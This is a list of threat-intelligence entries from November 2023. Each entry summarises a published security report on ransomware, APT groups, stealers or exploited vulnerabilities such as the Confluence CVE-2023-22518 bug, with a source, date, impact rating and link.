- Researchers from ASEC have kept an eye out for threats directed towards weakly maintained or unpatched web servers. Web servers are key targets for attack by threat actors since they are publicly accessible to provide web services to all users.
—
- Intel Source:
- Sentinelone
- Intel Name:
- A_Deep_Dive_into_a_Decade_of_Hack_for_Hire_Operations
- Date of Scan:
- 2023-11-20
- Impact:
- MEDIUM
- Summary:
- SentinelLabs’ latest report exposes the extensive activities of the Appin Security Group, a prominent player in the hack-for-hire services domain. The comprehensive analysis delves into a myriad of global cyber intrusions involving espionage, surveillance, and disruptive actions across countries such as Norway, Pakistan, China, and India.
Source:
https://www.sentinelone.com/labs/elephant-hunting-inside-an-indian-hack-for-hire-group/
—
- Intel Source:
- Esentire
- Intel Name:
- SolarMarker_Evolution_and_Tactics_Unveiled_in_2023
- Date of Scan:
- 2023-11-20
- Impact:
- LOW
- Summary:
- The eSentire Threat Response Unit (TRU) has closely monitored the SolarMarker malware, also known as Jupyter, since 2021. This .NET-based malware with backdoor capability primarily targets vulnerable WordPress websites to distribute its payload. Over the years, SolarMarker has evolved its decryption routines, transitioning from XOR encryption to AES while maintaining its core functionality.
Source:
https://www.esentire.com/blog/solarmarker-to-jupyter-and-back
—
- Intel Source:
- sentinelone
- Intel Name:
- AI_Crimeware_Ransomware_Surge_Israel_Hamas_Cyber_Warfare
- Date of Scan:
- 2023-11-20
- Impact:
- MEDIUM
- Summary:
- A SentinelLabs report delves into current trends shaping the cyber threat landscape. It scrutinizes the evolving landscape of AI-driven crimeware, spotlighting tools like FraudGPT and WolfGPT. Additionally, it details notable ransomware incidents targeting institutions such as ICBC, the Toronto Public Library, and Japan Aviation Electronics.
—
- Intel Source:
- Security Boulevard
- Intel Name:
- Underscore_a_persistent_risk_in_open_source_npm_software
- Date of Scan:
- 2023-11-19
- Impact:
- MEDIUM
- Summary:
- Open source software packages recently discovered on the npm platform contain scripts broadcasting peace messages related to ongoing conflicts. These packages are examples of protestware, which can be benign or malicious. The risks of protestware are discussed, emphasizing the need for development organizations to investigate the code they rely on.
Source:
https://securityboulevard.com/2023/11/protestware-taps-npm-to-call-out-wars-in-ukraine-gaza/
—
- Intel Source:
- CERT-UA
- Intel Name:
- Remcos_RAT_attacks_disguised_as_SBU_request
- Date of Scan:
- 2023-11-18
- Impact:
- MEDIUM
- Summary:
- The government computer emergency response team of Ukraine, CERT-UA, discovered the mass distribution of e-mails, allegedly on behalf of the Security Service of Ukraine, with an attachment in the form of a RAR file “Electronic request of the SBU of Ukraine.rar”.
—
- Intel Source:
- CISA
- Intel Name:
- Scattered_Spider
- Date of Scan:
- 2023-11-18
- Impact:
- HIGH
- Summary:
- The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) in response to recent activity by Scattered Spider threat actors against the commercial facilities sectors and subsectors. This advisory provides tactics, techniques, and procedures (TTPs) obtained through FBI investigations as recently as November 2023. Scattered Spider is a cybercriminal group that targets large companies and their contracted information technology (IT) help desks. Scattered Spider threat actors, per trusted third parties, have typically engaged in data theft for extortion and have also been known to utilize BlackCat/ALPHV ransomware alongside their usual TTPs.
Source:
https://www.cisa.gov/sites/default/files/2023-11/aa23-320a_scattered_spider.pdf
—
- Intel Source:
- Checkmarx
- Intel Name:
- Python_Developers_Hidden_in_Plain_Sight_For_Nearly_Six_Months
- Date of Scan:
- 2023-11-18
- Impact:
- LOW
- Summary:
- Researchers at Checkmarx have discovered that a threat actor has been inserting malicious Python packages into the open-source repository for almost six months. Numerous harmful packages are disguising themselves under names that closely resemble well-known, authentic Python packages. As a result, they were downloaded thousands of times.
—
- Intel Source:
- Antiy CERT
- Intel Name:
- A_new_round_of_attacks_by_the_Youshe_group
- Date of Scan:
- 2023-11-18
- Impact:
- LOW
- Summary:
- Recently, Antiy CERT has detected a new round of phishing attacks by the “Youshe” black-market gang (“Silver Fox”) targeting financial personnel and small store merchant customer service. In this round of attacks, the gang disguised the malicious program as a document file and packaged it into a compressed archive. It spread through the model of “black-market gang - agent - recruited members - target search”, inducing users to execute it and thereby obtaining remote control of the victim host.
Source:
https://www.antiy.cn/research/notice&report/research_report/SwimSnake_Analysis.html
—
- Intel Source:
- Intezer
- Intel Name:
- Dismantling_the_IPStorm_Botnet_Infrastructure
- Date of Scan:
- 2023-11-18
- Impact:
- LOW
- Summary:
- The FBI disclosed the breakdown of a botnet proxy network by US law enforcement and the guilty plea of the person in charge of the botnet infrastructure connected to the IPStorm virus. In the continuous fight against cyberthreats, this accomplishment represents a critical turning point. As the new IPStorm malware versions and capabilities spread to infect Linux, Mac, and Android devices worldwide, the research team at Intezer shared their discoveries and analysis with the FBI to aid in their case.
Source:
https://intezer.com/blog/research/a-storm-is-brewing-ipstorm-now-has-linux-malware/
—
- Intel Source:
- Google Blog
- Intel Name:
- Zimbra_0_day_attacks_on_international_government_organizations
- Date of Scan:
- 2023-11-18
- Impact:
- MEDIUM
- Summary:
- Google’s Threat Analysis Group (TAG) discovered an in-the-wild 0-day exploit targeting Zimbra Collaboration, an email server. Four different groups were observed exploiting the same bug to steal data, credentials, and tokens. TAG urges users to keep software up-to-date and apply security updates to protect against these types of exploits. They also add identified websites and domains to Safe Browsing.
—
- Intel Source:
- Antiy
- Intel Name:
- Analysis_of_a_LockBit_Ransomware_Sample
- Date of Scan:
- 2023-11-18
- Impact:
- MEDIUM
- Summary:
- Ransomware was recently used to attack a financial institution. Information from a number of sources suggests that this incident is closely associated with the group behind the LockBit ransomware attack. Antiy CERT describes LockBit as having a “close association” since it is an attack group that uses the “ransomware as a service” (RaaS) paradigm.
Source:
https://www.antiy.cn/research/notice&report/research_report/LockBit.html
—
- Intel Source:
- ASEC
- Intel Name:
- Distribution_of_malware_mimicking_a_LNK
- Date of Scan:
- 2023-11-17
- Impact:
- LOW
- Summary:
- Malicious shortcut files are being distributed by a threat actor targeting individuals in the field of Korean reunification and national security. The malware breaches user information and downloads additional malware, including TutRAT, which allows malicious behaviors such as keylogging and stealing browser account information. AhnLab recommends subscribing to their threat intelligence platform to check related IOCs.
—
- Intel Source:
- Fortinet
- Intel Name:
- The_NoEscape_ransomware_roundup
- Date of Scan:
- 2023-11-17
- Impact:
- MEDIUM
- Summary:
- NoEscape ransomware group emerged in May 2023 and runs a Ransomware-as-a-Service program targeting multiple industry verticals, primarily in the US. It encrypts files and leaves a ransom note, and victims can contact the threat actor through a TOR site. Fortinet customers are protected, and best practices are provided to protect against ransomware.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-noescape
—
- Intel Source:
- ISC. SANS
- Intel Name:
- MSIX_Package
- Date of Scan:
- 2023-11-17
- Impact:
- LOW
- Summary:
- This article discusses the MSIX package file format and how GHOSTPULSE malware was identified to bypass security controls. It explains how a hunting rule was created to detect ZIP archives containing two files, and provides an example of a low VT score MSIX file. It also explains the content of the wrapper and config files, and how the script “worldhack.ps1” is automatically executed during package installation, with the payload identified as Redline.
—
- Intel Source:
- Securityjoes
- Intel Name:
- An_Extensive_Data_Wiping_Operation_Aimed_Against_Israel
- Date of Scan:
- 2023-11-17
- Impact:
- MEDIUM
- Summary:
- Researchers at SecurityJoes have investigated a sophisticated security compromise that resulted in substantial data loss affecting multiple businesses. Defense contractors and an Israeli data hosting provider were among the targets.
—
- Intel Source:
- SektorCERT
- Intel Name:
- Cyberattack_on_Danish_Critical_Infrastructure_Linked_to_Russian_Hackers
- Date of Scan:
- 2023-11-17
- Impact:
- MEDIUM
- Summary:
- Possible connections exist between Russian threat actors and what has been called the “largest cyber attack against Danish critical infrastructure,” which took place in May 2023 and targeted 22 businesses involved in the nation’s energy management.
—
- Intel Source:
- CISA
- Intel Name:
- Rhysida_Ransomware
- Date of Scan:
- 2023-11-17
- Impact:
- HIGH
- Summary:
- The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known Rhysida ransomware IOCs and TTPs identified through investigations as recently as September 2023. Rhysida—an emerging ransomware variant—has predominately been deployed against the education, healthcare, manufacturing, information technology, and government sectors since May 2023. The information in this CSA is derived from related incident response investigations and malware analysis of samples discovered on victim networks.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-319a
—
- Intel Source:
- Cyber Geeks
- Intel Name:
- Dark_Pink_APT_Deployments
- Date of Scan:
- 2023-11-16
- Impact:
- MEDIUM
- Summary:
- The Asia-Pacific (APAC) region is currently experiencing a surge in advanced persistent threat (APT) attacks, which have been linked to a recently discovered group called Dark Pink (also known as the Saaiwc Group). Even though there is evidence that Dark Pink started operating as early as mid-2021, the group’s activity really picked up in the latter half of 2022.
Source:
https://cyberint.com/blog/research/dark-pink-apt-attacks/
—
- Intel Source:
- Quointelligence
- Intel Name:
- The_Russian_speaking_voter_information_operation_in_Spain
- Date of Scan:
- 2023-11-16
- Impact:
- MEDIUM
- Summary:
- Quointelligence researchers gave an account of a recent information operation that targeted Spain’s Russian-speaking population.
—
- Intel Source:
- Cyble
- Intel Name:
- Active_Vulnerability_Exploitation_for_Citrix_and_Big_IP
- Date of Scan:
- 2023-11-16
- Impact:
- LOW
- Summary:
- Researchers at Cyble have discovered that recently discovered vulnerabilities—which were first mentioned in the most recent Cybersecurity and Infrastructure Security Agency (CISA) advisory—are still being exploited. By releasing security alerts for the Big IP vulnerabilities (CVE-2023-46747, CVE-2023-46748) on October 31 and the actively exploited Citrix vulnerability (CVE-2023-4966) on October 10, CISA demonstrated proactive actions.
—
- Intel Source:
- Infoblox
- Intel Name:
- The_DGAs_New_Face
- Date of Scan:
- 2023-11-16
- Impact:
- LOW
- Summary:
- Infoblox has been offering DNS detection and response to domain generation algorithms (DGAs) since 2015. DGAs are a common tool used by DNS threat actors to disseminate illicit content, adware, malware, and phishing campaigns.
Source:
https://blogs.infoblox.com/cyber-threat-intelligence/rdgas-the-new-face-of-dgas/
—
- Intel Source:
- Cyber Geeks
- Intel Name:
- Personal_Attacks_on_Romanian_Gas_Companies
- Date of Scan:
- 2023-11-16
- Impact:
- LOW
- Summary:
- Researchers at Cyber Geeks have examined a scheme that exposes newly registered domains posing as well-known Romanian gas companies.
Source:
https://cybergeeks.tech/attackers-impersonate-romanian-gas-companies-osint-investigation/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- The_skimming_campaign_during_holidays
- Date of Scan:
- 2023-11-16
- Impact:
- MEDIUM
- Summary:
- The article discusses the rise of credit card skimming during the holiday shopping season. It explains that malicious code is often embedded in merchant websites, making it difficult to detect when credit card information is stolen. It also describes the Kritec skimming campaign, active since March 2023, provides advice on how to shop safely online, and lists indicators of compromise associated with the Kritec campaign.
—
- Intel Source:
- Esentire
- Intel Name:
- Nitrogen_Campaign_2
- Date of Scan:
- 2023-11-15
- Impact:
- MEDIUM
- Summary:
- Researchers observed multiple incidents from a new Nitrogen campaign leading to ALPHV/BlackCat Ransomware infections. This campaign involved drive-by downloads where users inadvertently installed malicious software from compromised websites or through deceptive search advertisements. The initial infection was traced to an unmanaged device with access to the customer’s network, involving the download of Nitrogen payloads. The ISO file related to the infection contained several files, including executables and DLLs that decrypted additional ZIP archives containing malicious payloads. The campaign utilized encrypted commands in scheduled tasks and employed advanced techniques like transacted hollowing for process injection. Researchers noted enhanced capabilities in the malware, including AMSI bypass, ETW and WLDP patching, and antivirus evasion. The post-exploitation activities included lateral movement, data exfiltration, and the deployment of ALPHV ransomware, which encrypted files and exfiltrated data, significantly impacting the affected organizations.
—
- Intel Source:
- PaloAlto
- Intel Name:
- The_dangers_of_viewing_Clickbait_sites
- Date of Scan:
- 2023-11-15
- Impact:
- MEDIUM
- Summary:
- This article discusses the vulnerability CVE-2023-3169, which affects WordPress sites using the Newspaper and Newsmag themes with the Composer plugin. It reveals a massive campaign using the Balada Injector to exploit the vulnerability, and provides an example of the malicious script injected into webpages. It also outlines the trend of clickbait and ad sites being compromised at a nearly three to one ratio compared to other categories. Finally, it provides advice for readers to be aware of the risk and adjust their browsing habits accordingly.
Source:
https://unit42.paloaltonetworks.com/dangers-of-clickbait-sites/
—
- Intel Source:
- ASEC
- Intel Name:
- A_malware_strain_distribution_through_breached_legitimate_website
- Date of Scan:
- 2023-11-15
- Impact:
- LOW
- Summary:
- AhnLab EDR detected a malware strain distributed through breached legitimate websites using LNK files. It records file infiltration and exfiltration and allows users to view the infiltration path and file information. The malicious features of the script include executing another script, collecting system information, registering itself in the autorun registry, and sending data. AhnLab EDR protects the endpoint environment by providing behavioral detection, advanced analysis, holistic visibility, and proactive threat hunting.
—
- Intel Source:
- Proofpoint
- Intel Name:
- TA402_with_IronWind_Infection_target_Middle_East_Based_Government
- Date of Scan:
- 2023-11-15
- Impact:
- HIGH
- Summary:
- From July to October 2023, researchers observed the TA402 group executing targeted phishing campaigns against Middle East and North Africa government entities using a complex infection chain called IronWind. The group varied its attack methods, shifting from Dropbox links to XLL and RAR file attachments to deliver the multifunctional malware. TA402’s campaigns involved phishing emails with lures related to economic themes or regional conflicts, utilizing compromised email accounts to deliver malware that communicated with a command-and-control domain. The IronWind downloader initiated a multi-stage infection process, involving a .NET executable and shellcode, aimed at espionage and intelligence collection. The group consistently employed geofencing techniques to hinder detection and maintained a focus on specific targets, despite ongoing regional conflicts. This activity demonstrates TA402’s persistent and evolving approach to cyber espionage.
—
- Intel Source:
- nccgroup
- Intel Name:
- Medusa_RaaS
- Date of Scan:
- 2023-11-15
- Impact:
- MEDIUM
- Summary:
- Researchers have analyzed the Medusa ransomware, a Ransomware-as-a-Service active since 2021, known for its double-extortion method. In a recent incident, initial access was gained through an exploited web server, leading to the deployment of webshells for continuous access. The attackers executed a range of activities, including using PowerShell to disable antivirus services, dumping password hashes, and exfiltrating data. The ransomware, which encrypts and threatens to release data unless a ransom is paid, was deployed over a 271-day period, utilizing various techniques for persistence and defense evasion. These included creating new user accounts, uploading web shells, and disabling Windows Defender. Lateral movement within the network was facilitated through Remote Desktop Protocol, and command-and-control was maintained via a reverse tunnel. The attack culminated in the deployment of the Medusa ransomware, resulting in encrypted files with the .MEDUSA extension and significant system recovery impediments due to the deletion of VMs and backups.
Source:
https://research.nccgroup.com/2023/11/13/dont-throw-a-hissy-fit-defend-against-medusa/
—
- Intel Source:
- Malware Analysis
- Intel Name:
- Ddostf_DDoS_Bot_Malware_Attacking_MySQL_Servers
- Date of Scan:
- 2023-11-15
- Impact:
- MEDIUM
- Summary:
- Ddostf DDoS bot is a malware targeting vulnerable MySQL servers. This bot, first identified in 2016 and known to operate in both Windows and Linux environments, conducts Distributed Denial of Service attacks. Attackers exploit MySQL servers exposed on port 3306/TCP, often through brute-force or dictionary attacks, and may also exploit system vulnerabilities. The Ddostf bot employs User-Defined Function (UDF) DLLs to execute commands on the infected system, including downloading and executing additional malware. Ddostf copies itself under a random name in the system directory, registers as a service, and connects to a command-and-control server, to which it sends system information.
Source:
https://malware.news/t/ddostf-ddos-bot-malware-attacking-mysql-servers/75611
—
- Intel Source:
- GBHackers
- Intel Name:
- APT_Infrastructure_in_China_Imitates_Cloud_Backup_Services
- Date of Scan:
- 2023-11-15
- Impact:
- MEDIUM
- Summary:
- GBHackers researchers have found that Chinese APT actors have targeted and penetrated government agencies in Cambodia. The threat actors use their infrastructure to pose as a cloud backup service, and that infrastructure also shows a number of persistent malicious connections.
Source:
https://gbhackers.com/chinese-apt-mimics-cloud-backup/
—
- Intel Source:
- Malware news
- Intel Name:
- The_exploitation_of_disguised_media_websites
- Date of Scan:
- 2023-11-15
- Impact:
- MEDIUM
- Summary:
- This article provides an overview of the lack of content in the section. It highlights the need for more content to be added in order to provide a comprehensive understanding of the topic.
—
- Intel Source:
- Resecurity
- Intel Name:
- The_increase_of_ransomware_attacks_on_the_energy_sector_and_on_nuclear_energy_firms
- Date of Scan:
- 2023-11-15
- Impact:
- HIGH
- Summary:
- Resecurity has identified a potential breach of Doosan’s Active Directory and other nuclear research organizations, as well as a BlackCat Ransomware attack on the European energy sector in February 2022. Additionally, threat actors have been targeting nuclear-energy firms and related entities, such as Brazil’s National Nuclear Energy Commission, Israel’s Neve Ne’eman nuclear reactor, and Indonesia’s National Nuclear Energy Agency (Batan). In April 2022, Oil India Limited (OIL) was hit by a ransomware attack, and in March 2022, State Electric Company Limited (STELCO) in Maldives experienced a ransomware attack by the Hive group.
—
- Intel Source:
- SentinelOne
- Intel Name:
- C3RB3R_Ransomware_Ongoing_Exploitation_of_CVE_2023_22518_Targets_Unpatched_Confluence_Servers
- Date of Scan:
- 2023-11-15
- Impact:
- MEDIUM
- Summary:
- Researchers have observed an increase in the exploitation of CVE-2023-22518, a vulnerability in Atlassian’s Confluence Data Center and Server, which allows unauthorized creation of backdoor administrator accounts. This vulnerability has been leveraged in multiple campaigns to deploy new Cerber ransomware variants, targeting both Windows and Linux hosts. The attack begins with a specially crafted HTTP-POST command to the exposed Confluence instance, leading to administrative control. Attackers then execute PowerShell scripts to download and execute the ransomware payloads. These payloads, observed on remote servers, include Linux and Windows versions of Cerber, which encrypt files and append a “.L0CK3D” extension, while also attempting to remove Volume Shadow Copies. The ransomware leaves a note with a unique TOR-based portal for victims to pay the ransom.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Ongoing_Exploitation_of_Critical_Atlassian_Authentication_Bypass_Vulnerability_CVE_2023_22518
- Date of Scan:
- 2023-11-14
- Impact:
- LOW
- Summary:
- This report outlines the active exploitation of a severe authentication bypass vulnerability (CVE-2023-22518) in Atlassian products. Despite initial reassurances from Atlassian, evidence reveals ongoing exploitation attempts, with attackers targeting specific URLs and utilizing a common header. The first incidents were detected on November 2nd, originating from diverse IP addresses, including Digital Ocean, Indian, and US-based sources. Notably, a parallel scan for the unrelated /rest/api/user URL suggests broader security concerns. Organizations are urged to take immediate action, applying patches and monitoring for suspicious activity to safeguard their Atlassian instances.
—
- Intel Source:
- Huntress
- Intel Name:
- Bitter_Pill_Third_Party_Pharmaceutical_Vendor_Linked_to_Pharmacy_and_Health_Clinic_Cyberattack
- Date of Scan:
- 2023-11-14
- Impact:
- LOW
- Summary:
- Attackers exploited a locally hosted instance of ScreenConnect, a remote access tool used by Outcomes. The attack involved four instances of ScreenConnect across two distinct endpoints, with one instance used on both endpoints. Tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) were similar across these endpoints. The attackers ensured persistent access by installing additional remote access tools such as ScreenConnect or AnyDesk. One endpoint, a Windows Server 2019 Standard system in the pharmaceutical field, showed repeated access from August 9, 2023, using ScreenConnect, highlighting the sustained nature of the attack.
—
- Intel Source:
- ASEC
- Intel Name:
- Phishing_PDF_Files_Downloading_Malicious_Packages
- Date of Scan:
- 2023-11-14
- Impact:
- LOW
- Summary:
- PDFs, disguised as game downloads or cracked software, lead users to a website where they download an encrypted file. Upon decryption and execution, this file, “File.exe,” modifies registry values to disable Windows Defender and steals IP and location information using browser login data. It then downloads various types of malware, including ransomware, PUPs, infostealers, and droppers. The malware creates multiple subfiles and folders, significantly compromising the infected system. This campaign demonstrates the sophisticated methods used to distribute and execute multiple malware types, highlighting the need for caution when handling files from untrusted sources.
—
- Intel Source:
- Kaspersky Content Hub
- Intel Name:
- Modern_Asian_APT_Groups
- Date of Scan:
- 2023-11-14
- Impact:
- MEDIUM
- Summary:
- This report provides comprehensive intelligence on Asian Advanced Persistent Threat (APT) groups, aiming to equip cybersecurity professionals with the knowledge to counteract these threats. It details incidents across the globe, the tactics, techniques, and procedures (TTPs) employed by these groups, and the pattern of attacks that span various countries and industries. The report is structured to aid a wide range of cybersecurity roles, including SOC analysts and C-Level executives, with technical details, mitigation strategies, and statistics on attack victims. It’s intended as a valuable resource for detecting and defending against the sophisticated tools and techniques of Asian APT actors.
—
- Intel Source:
- Blackberry
- Intel Name:
- BiBi_Wiper
- Date of Scan:
- 2023-11-14
- Impact:
- LOW
- Summary:
- BiBi Wiper is a malware originally targeting Linux systems and now adapted to run on Windows. This malware is designed to cause data destruction without leaving a ransom note or contacting command-and-control servers. Its name, “BiBi,” references the nickname of Israeli Prime Minister Benjamin Netanyahu and is hardcoded into the malware. The Windows version of BiBi Wiper employs techniques to maximize damage, including running multiple threads and targeting specific file types for destruction, while sparing essential system files. As the conflict continues, the use of such wipers in cyber warfare is expected to increase, highlighting the intertwining of physical and cyber conflicts.
Source:
https://blogs.blackberry.com/en/2023/11/bibi-wiper-used-in-the-israel-hamas-war-now-runs-on-windows
—
- Intel Source:
- Palo Alto
- Intel Name:
- CVE_2023_36884_and_CVE_2023_36584
- Date of Scan:
- 2023-11-14
- Impact:
- MEDIUM
- Summary:
- CVE-2023-36584 has been used in a cyberattack campaign by a pro-Russian APT group, Storm-0978 (also known as the RomCom Group). This campaign, observed in July 2023, targeted groups supporting Ukraine’s admission into NATO. The attack utilized a sophisticated exploit chain involving a remote code execution vulnerability in Microsoft Office (CVE-2023-36884) to deliver malware. The lure was a weaponized Microsoft Word document, disguised as talking points for the NATO Summit on Ukraine. The vulnerability allowed bypassing of Microsoft’s Mark-of-the-Web security feature, a critical aspect in the attack’s success.
—
- Intel Source:
- Kaspersky
- Intel Name:
- Ducktail_malware_spreading_through_fake_clothing_job_ads
- Date of Scan:
- 2023-11-14
- Impact:
- LOW
- Summary:
- The Ducktail malware, active since 2021 and targeting Facebook business accounts, has been the focus of a recent campaign between March and October 2023, specifically targeting marketing professionals. This new version, written in Delphi, spreads via emails containing archives with images of new products and a malicious executable disguised as a PDF. The malware installs a browser extension that steals Facebook business and ad accounts. It manipulates browser shortcuts for Chromium-based browsers and uses AES encryption for some of its strings. The extension, disguised as Google Docs Offline, targets Facebook-related URLs to steal cookies and account details, potentially bypassing two-factor authentication using Facebook API requests and the 2fa.live service.
Source:
https://securelist.com/ducktail-fashion-week/111017/
—
- Intel Source:
- CISA
- Intel Name:
- Royal_Ransomware_November2023
- Date of Scan:
- 2023-11-14
- Impact:
- HIGH
- Summary:
- Since September 2022, Royal has targeted over 350 known victims worldwide and ransomware demands have exceeded 275 million USD. Royal conducts data exfiltration and extortion prior to encryption and then publishes victim data to a leak site if a ransom is not paid. Phishing emails are among the most successful vectors for initial access by Royal threat actors. There are indications that Royal may be preparing for a re-branding effort and/or a spinoff variant. Blacksuit ransomware shares a number of identified coding characteristics similar to Royal. A previous joint CSA for Royal ransomware was published on March 2, 2023. This joint CSA provides updated IOCs identified through FBI investigations.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a
—
- Intel Source:
- TrendMicro
- Intel Name:
- Cerber_Ransomware_Exploits_Atlassian_Confluence_Vulnerability_CVE_23_2251
- Date of Scan:
- 2023-11-14
- Impact:
- LOW
- Summary:
- On October 31, 2023, Atlassian announced CVE-2023-22518, an improper authorization vulnerability in Confluence Data Center and Server, allowing unauthorized creation of admin accounts. The vulnerability’s proof-of-concept was publicly leaked soon after. Researchers noted that Cerber ransomware is exploiting this vulnerability, reminiscent of Cerber’s 2021 attacks on Atlassian’s GitLab servers. The attack involves using a PowerShell command to download and execute a remote payload, connecting to a command-and-control server, and decrypting a text file to reveal the Cerber ransomware payload. This payload encrypts files and appends the “.L0CK3D” extension, also dropping a ransom note in all directories. The new Cerber variant has slight differences from older ones, indicating an evolution of the ransomware’s techniques.
Source:
https://www.trendmicro.com/en_us/research/23/k/cerber-ransomware-exploits-cve-2023-22518.html
—
- Intel Source:
- Cado Security
- Intel Name:
- OracleIV
- Date of Scan:
- 2023-11-14
- Impact:
- MEDIUM
- Summary:
- OracleIV is a Dockerized Distributed Denial of Service (DDoS) botnet. This malware targets publicly exposed Docker Engine API instances, exploiting misconfigurations to deliver a malicious Docker container. The container, named “oracleiv_latest,” contains Python malware compiled as an ELF executable, capable of performing various DoS attacks. Attackers initiate access through an HTTP POST request to Docker’s API, pulling the malicious image from Docker Hub. The malware connects to a Command and Control server for instructions, using novel authentication methods.
Source:
https://www.cadosecurity.com/oracleiv-a-dockerised-ddos-botnet/
—
- Intel Source:
- FarghlyMal
- Intel Name:
- Stealc_Stealer
- Date of Scan:
- 2023-11-14
- Impact:
- MEDIUM
- Summary:
- Stealc, a sophisticated information stealer, stands out for its non-resident nature and flexible data collection settings. Its development draws inspiration from other well-known stealers such as Vidar, Raccoon, Mars, and Redline. Notably, Stealc can exfiltrate a vast array of data directly to a Command & Control server, bypassing traditional data storage methods. This capability includes stealing browser-based information such as logins, credit card details, cookies, and history, along with wallet extensions, local crypto wallet files, various account tokens, and configuration files from applications such as Discord, Telegram, Steam, qTox, and Pidgin. Stealc can also take screenshots of the victim’s machine. The malware employs techniques such as opaque predicates for obfuscation and base64 encoding with RC4 decryption for its configuration, highlighting its complexity and evasive capabilities.
Source:
https://farghlymal.github.io/Stealc-Stealer-Analysis/
—
- Intel Source:
- Security Boulevard
- Intel Name:
- Atom_Keylogger
- Date of Scan:
- 2023-11-14
- Impact:
- LOW
- Summary:
- Atom Keylogger is a budget-friendly and user-friendly malware aimed at aspiring cybercriminals. Sold on cybercrime forums for around $15 and payable through cryptocurrencies such as Bitcoin, it is designed to secretly record keystrokes and other user activities on infected computers. This functionality enables the theft of sensitive information such as passwords, credit card numbers, and personal data. Atom Keylogger’s low cost, ease of use, and stealthy capabilities make it a significant threat in the cybercrime landscape, allowing even unskilled individuals to engage in cybercrime and identity theft.
—
- Intel Source:
- NSFocus
- Intel Name:
- THE_NEW_APT_GROUP_DARKCASINO_AND_THE_GLOBAL_SURGE_IN_WINRAR_0_DAY_EXPLOITS
- Date of Scan:
- 2023-11-14
- Impact:
- MEDIUM
- Summary:
- DarkCasino is economically motivated and targets industries such as cryptocurrency trading, online casinos, and online banking. Its primary attack vectors are watering hole phishing and spear phishing. The CVE-2023-38831 vulnerability allows arbitrary code execution in WinRAR, and DarkCasino began exploiting it in April 2023. This vulnerability became a significant tool for attackers, with widespread exploitation observed by various APT groups, including DarkPink in Southeast Asia and Konni in East Asia, targeting government agencies and refining their attack processes and techniques.
—
- Intel Source:
- Rexorvc0
- Intel Name:
- SystemBC_Coroxy_DroxiDat
- Date of Scan:
- 2023-11-13
- Impact:
- MEDIUM
- Summary:
- SystemBC is a versatile malware known as Coroxy or DroxiDat, which functions as proxy malware, a bot, a backdoor, and even a Remote Access Trojan (RAT). Active since 2018, it’s popular in underground markets and is used by various threat actors for different purposes, including reconnaissance, lateral movement, and deploying additional malware. SystemBC typically gathers system and user information, establishes persistence, and creates a Socks5 connection with a Command and Control server. Various groups have used SystemBC, many linked to ransomware activities.
Source:
https://rexorvc0.com/2023/11/12/Swiss-Knife-SystemBC-Coroxy/
—
- Intel Source:
- Bitdefender
- Intel Name:
- Hive_Ransomware_Offspring
- Date of Scan:
- 2023-11-13
- Impact:
- MEDIUM
- Summary:
- The recent emergence of Hunters International, a new ransomware group, follows the FBI-led dismantlement of Hive, a notorious ransomware collective. Despite Hive’s shutdown and the FBI’s efforts to mitigate damage by distributing decryption keys, this new group appears to have adopted Hive’s assets and technology. Hunters International distinguishes itself by focusing more on data exfiltration rather than encryption, and has simplified its ransomware code, now written in Rust, a language favored for its security features. Their approach reflects the evolving landscape of cyber threats, highlighting the persistence and adaptability of such groups in the face of law enforcement actions.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Spammers_abuse_Google_Forms_quiz_to_deliver_scams
- Date of Scan:
- 2023-11-10
- Impact:
- LOW
- Summary:
- Cisco Talos has recently observed an increase in spam messages abusing a feature of quizzes created within Google Forms. In particular, spammers have discovered that they can create a new quiz in Google Forms, use the victim’s email address to respond to the quiz, and then abuse the “Release Scores” feature of the Google Form to deliver their spam to the victim. Because the spam messages emanate from Google itself, the messages have a good chance of landing in the victim’s inbox.
Source:
https://blog.talosintelligence.com/google-forms-quiz-spam/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Code_Injection_Examples_in_Visual_Form
- Date of Scan:
- 2023-11-10
- Impact:
- LOW
- Summary:
- These days, code injection techniques (such as MITRE ATT&CK T1055) are frequently used. They allow an attacker to neatly conceal malicious code inside a legitimate process. A variation on this method is known as “Process Hollowing,” in which malicious code replaces the code of a legitimately started process that has been suspended. Code injection is performed by calling Windows API functions such as VirtualAllocEx(), NtUnmapViewOfSection(), and WriteProcessMemory().
Source:
https://isc.sans.edu/diary/Visual+Examples+of+Code+Injection/30388/
—
- Intel Source:
- Red Canary
- Intel Name:
- Adversaries_exploit_Confluence_vulnerability_to_deploy_ransomware
- Date of Scan:
- 2023-11-10
- Impact:
- MEDIUM
- Summary:
- Red Canary reported the exploitation of Atlassian Confluence CVE-2023-22518, leading to attempts to deploy Cerber ransomware. The vulnerability allows unauthenticated users to upload a .zip file to Confluence instances, enabling data destruction or remote code execution. Red Canary suggests updating Confluence to the versions specified by Atlassian to mitigate the risk. The observed attack involved uploading a web shell, running reconnaissance commands, and executing encoded PowerShell to download ransomware.
Source:
https://redcanary.com/blog/confluence-exploit-ransomware/
—
- Intel Source:
- TrendMicro
- Intel Name:
- How_Kopeechka_an_Automated_Social_Media_Accounts_Creation_Service_Can_Facilitate_Cybercrime
- Date of Scan:
- 2023-11-10
- Impact:
- LOW
- Summary:
- Kopeechka is a service active since 2019, facilitating automated registration of social media accounts by bypassing email verification and CAPTCHAs. It offers temporary access to emails for account confirmation without providing actual mailbox access, enabling the creation of accounts on various platforms. Kopeechka also provides integration with online SMS services for phone verification. This service, while not illegal, supports large-scale cybercrime activities such as spamming and misinformation by allowing the creation of numerous accounts quickly and inexpensively. The emergence of such services underscores the professionalization of cybercrime and the need for stronger security measures by social media platforms.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Hackers_Harvesting_Credentials_Using_File_Sharing_Services_and_Reverse_Proxies
- Date of Scan:
- 2023-11-10
- Impact:
- LOW
- Summary:
